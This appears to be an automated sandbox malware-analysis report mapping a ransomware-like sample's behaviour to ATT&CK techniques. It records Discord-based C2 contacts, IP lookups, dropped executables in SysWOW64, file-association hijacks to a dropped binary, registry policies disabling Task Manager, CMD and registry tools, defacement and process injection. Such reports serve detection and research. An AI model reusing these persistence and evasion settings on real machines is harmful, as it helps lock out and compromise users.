execution

PowerShell

T1059.001

pid	Process
944	Process not Found

Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs

Web Service

T1102

flow	ioc
656	discord.com
1364	discord.com
854	discord.com
1420	discord.com
97	discord.com
197	discord.com
364	discord.com
731	discord.com
1005	discord.com
1038	discord.com
230	discord.com
329	discord.com
602	discord.com
590	discord.com
935	discord.com
73	discord.com
125	discord.com
173	discord.com
245	discord.com
652	discord.com
1058	discord.com
1149	discord.com
1378	discord.com
91	discord.com
133	discord.com
136	discord.com
194	discord.com
1165	discord.com
1429	discord.com
182	discord.com
968	discord.com
1022	discord.com
1441	discord.com
156	discord.com
204	discord.com
877	discord.com
212	discord.com
631	discord.com
209	discord.com
412	discord.com
737	discord.com
635	discord.com
1049	discord.com
86	discord.com
333	discord.com
381	discord.com
678	discord.com
1139	discord.com
122	discord.com
617	discord.com
628	discord.com
736	discord.com
965	discord.com
46	discord.com
58	discord.com
113	discord.com
140	discord.com
1154	discord.com
1359	discord.com
605	discord.com
726	discord.com
162	discord.com
532	discord.com
573	discord.com

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
781	ipinfo.io
925	ip-api.com
564	ipinfo.io
569	ipinfo.io
778	ipinfo.io

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x00070000000246c4-24152.dat	autoit_exe
behavioral2/files/0x0007000000024c25-29658.dat	autoit_exe

Drops file in System32 directory 34 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\Kantuk.exe.tmp	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
File opened for modification	C:\Windows\SysWOW64\Windows_3D.scr	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
File opened for modification	C:\Windows\SysWOW64\GoldenGhost.exe	winlogon.exe
File opened for modification	C:\Windows\SysWOW64\Shell32.com	winlogon.exe
File created	C:\Windows\SysWOW64\Rar.ico	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
File opened for modification	C:\Windows\SysWOW64\K0L4B0R451.exe.tmp	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
File opened for modification	C:\Windows\SysWOW64\~A~m~B~u~R~a~D~u~L~\winlogon.exe	winlogon.exe
File opened for modification	C:\Windows\SysWOW64\K0L4B0R451.exe	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
File opened for modification	C:\Windows\SysWOW64\~A~m~B~u~R~a~D~u~L~\winlogon.exe	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\GoldenGhost.exe	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
File opened for modification	C:\Windows\SysWOW64\4K51K4.exe.tmp	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
File opened for modification	C:\Windows\SysWOW64\Shell32.com.tmp	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\~A~m~B~u~R~a~D~u~L~\JPG.ico	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\Player.ico	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
File opened for modification	C:\Windows\SysWOW64\~A~m~B~u~R~a~D~u~L~	winlogon.exe
File opened for modification	C:\Windows\SysWOW64\Shell32.com	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\Kantuk.exe	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\4K51K4.exe	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
File opened for modification	C:\Windows\SysWOW64\GoldenGhost.exe.tmp	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
File opened for modification	C:\Windows\SysWOW64\4K51K4.exe	winlogon.exe
File created	C:\Windows\SysWOW64\Folder.ico	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
File opened for modification	C:\Windows\SysWOW64\Kantuk.exe	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
File opened for modification	C:\Windows\SysWOW64\GoldenGhost.exe	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\K0L4B0R451.exe	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\Word.ico	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\~A~m~B~u~R~a~D~u~L~\winlogon.exe	winlogon.exe
File created	C:\Windows\SysWOW64\~A~m~B~u~R~a~D~u~L~\winlogon.exe	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\Shell32.com	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
File created	C:\Windows\SysWOW64\Asli.ico	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
File opened for modification	C:\Windows\SysWOW64\K0L4B0R451.exe	winlogon.exe
File opened for modification	C:\Windows\SysWOW64\~A~m~B~u~R~a~D~u~L~	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
File opened for modification	C:\Windows\SysWOW64\4K51K4.exe	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
File opened for modification	C:\Windows\SysWOW64\~A~m~B~u~R~a~D~u~L~\winlogon.exe.tmp	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
File opened for modification	C:\Windows\SysWOW64\Kantuk.exe	winlogon.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
5724	Process not Found
15872	Process not Found

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\Wallpaper = "C:\\Windows\\K0L4B0R451.jpg"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\K0L4B0R451.jpg	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral2/files/0x0007000000023714-2147.dat	pyinstaller

Program crash 14 IoCs

pid	pid_target	Process	procid_target
6676	6388	WerFault.exe	319
6136	1644	WerFault.exe	444
2804	6088	WerFault.exe	548
5240	4368	WerFault.exe	550
6244	3400	WerFault.exe	745
1952	5456	WerFault.exe	865
5424	13604	Process not Found
12468	14508	Process not Found	1110
14196	11624	Process not Found	1196
5916	3924	Process not Found	762
7020	16248	Process not Found	1542
12428	6108	Process not Found	1541
18392	14796	Process not Found	1528
9956	18420	Process not Found	2064

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winlogon.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	240919-hnkbeawejpeacbd21b64ff72559ab5eedcd804cf3b_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	240919-hn6jmswcldb34dcf7cb49490197ff10b28deeebcb734cefece1173b2c8fbbb22c41a62acdcN.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5000	backup.exe
8012	backup.exe
4900	backup.exe
1520	backup.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
10760	Process not Found
9240	Process not Found
7080	Process not Found
4196	Process not Found
11316	Process not Found

Modifies Control Panel 17 IoCs

evasion

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\TileWallpaper = "0"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\	winlogon.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\ScreenSaverIsSecure = "0"	winlogon.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\	winlogon.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\s1159 = "K0L4B0R451"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\s2359 = "K0L4B0R451"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\WallpaperStyle = "0"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\ScreenSaverIsSecure = "0"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\ScreenSaveTimeOut = "100"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\SCRNSAVE.EXE = "C:\\Windows\\system32\\Windows_3D.scr"	winlogon.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\ScreenSaveTimeOut = "100"	winlogon.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\s1159 = "K0L4B0R451"	winlogon.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\s2359 = "K0L4B0R451"	winlogon.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\SCRNSAVE.EXE = "C:\\Windows\\system32\\Windows_3D.scr"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\shell	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command\ = "\"C:\\Windows\\system32\\4K51K4.exe\" \"%1\"%*"	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\Install\command\ = "logoff.exe"	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\regfile\shell\Install\command\ = "logoff.exe"	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\Edit	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\regfile\shell\open\command\ = "logoff.exe"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\scrfile	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\regfile\shell\open\command\ = "logoff.exe"	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\Shell\Edit\Command	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\Install\command	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\regfile\shell\Install\command	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\scrfile\ = "K0L4B0R451 File"	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command\ = "\"C:\\Windows\\system32\\4K51K4.exe\" \"%1\"%*"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command\ = "\"C:\\Windows\\system32\\4K51K4.exe\" \"%1\"%*"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\ = "K0L4B0R451 File"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\regfile\shell\edit\command\ = "logoff.exe"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Windows\\system32\\4K51K4.exe\" \"%1\"%*"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\Edit\Command	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\Edit\Command\ = "logoff.exe"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\regfile	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\shell\Install\command	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command\ = "\"C:\\Windows\\system32\\4K51K4.exe\" \"%1\"%*"	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\regfile\shell\Install\command	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\scrfile\ = "K0L4B0R451 File"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\shell\Install\command	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "\"C:\\Windows\\system32\\4K51K4.exe\" \"%1\"%*"	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command\ = "\"C:\\Windows\\system32\\4K51K4.exe\" \"%1\"%*"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\Shell\Install\command	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\Shell\Edit\Command\ = "logoff.exe"	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\regfile\shell\open\command	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\scrfile	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\inffile	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\Install	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\scrfile\shell\open\command\ = "\"C:\\Windows\\system32\\4K51K4.exe\" \"%1\"%*"	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\Shell\Install\command\ = "logoff.exe"	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\scrfile\shell\open\command	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\scrfile\NeverShowExt = "1"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\regfile\shell	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\regfile\shell\Install	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\regfile\shell\Install\command\ = "logoff.exe"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile	winlogon.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\Edit\Command\ = "logoff.exe"	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\NeverShowExt = "1"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\Install\command\ = "logoff.exe"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\Shell\Install	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\Shell\Install\command\ = "logoff.exe"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\scrfile\shell\open\command	winlogon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\scrfile\NeverShowExt = "1"	winlogon.exe

Modifies registry key 1 TTPs 4 IoCs

Modify Registry

T1112

pid	Process
14340	Process not Found
7292	Process not Found
17664	Process not Found
9276	Process not Found

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
9808	Process not Found

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3068	Process not Found

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2636	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
2388	240919-hn6jmswcldb34dcf7cb49490197ff10b28deeebcb734cefece1173b2c8fbbb22c41a62acdcN.exe
3356	winlogon.exe
4964	240919-hnkbeawejpeacbd21b64ff72559ab5eedcd804cf3b_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2716 wrote to memory of 3172	2716	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe	83
PID 2716 wrote to memory of 3172	2716	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe	83
PID 3172 wrote to memory of 4880	3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe	84
PID 3172 wrote to memory of 4880	3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe	84
PID 3172 wrote to memory of 2636	3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe	87
PID 3172 wrote to memory of 2636	3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe	87
PID 3172 wrote to memory of 2636	3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe	87
PID 3172 wrote to memory of 2388	3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe	88
PID 3172 wrote to memory of 2388	3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe	88
PID 3172 wrote to memory of 2388	3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe	88
PID 2636 wrote to memory of 3356	2636	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe	89
PID 2636 wrote to memory of 3356	2636	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe	89
PID 2636 wrote to memory of 3356	2636	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe	89
PID 3172 wrote to memory of 4964	3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe	90
PID 3172 wrote to memory of 4964	3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe	90
PID 3172 wrote to memory of 4964	3172	69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe	90

System policy modification 1 TTPs 18 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu = "1"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer	240919-hn6jmswcldb34dcf7cb49490197ff10b28deeebcb734cefece1173b2c8fbbb22c41a62acdcN.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1"	winlogon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu = "1"	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr = "1"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu = "1"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	winlogon.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer	winlogon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu = "1"	winlogon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions = "1"	240919-hn6jmswcldb34dcf7cb49490197ff10b28deeebcb734cefece1173b2c8fbbb22c41a62acdcN.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1"	winlogon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	winlogon.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1"	winlogon.exe

C:\Users\Admin\AppData\Local\Temp\69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe
"C:\Users\Admin\AppData\Local\Temp\69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2716
- C:\Users\Admin\AppData\Local\Temp\69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe
  "C:\Users\Admin\AppData\Local\Temp\69ea9eb202c6d0c1577cc202864fb1d1a8981291efeab3ad1d32a5379dc84591.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:4880
- - C:\Users\Admin\Downloads\240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hn9laswclgeacc501779cdc2fda21e317648e08d0f_JaffaCakes118.exe
    3⤵
    - Modifies WinLogon for persistence
    - Modifies visibility of file extensions in Explorer
    - UAC bypass
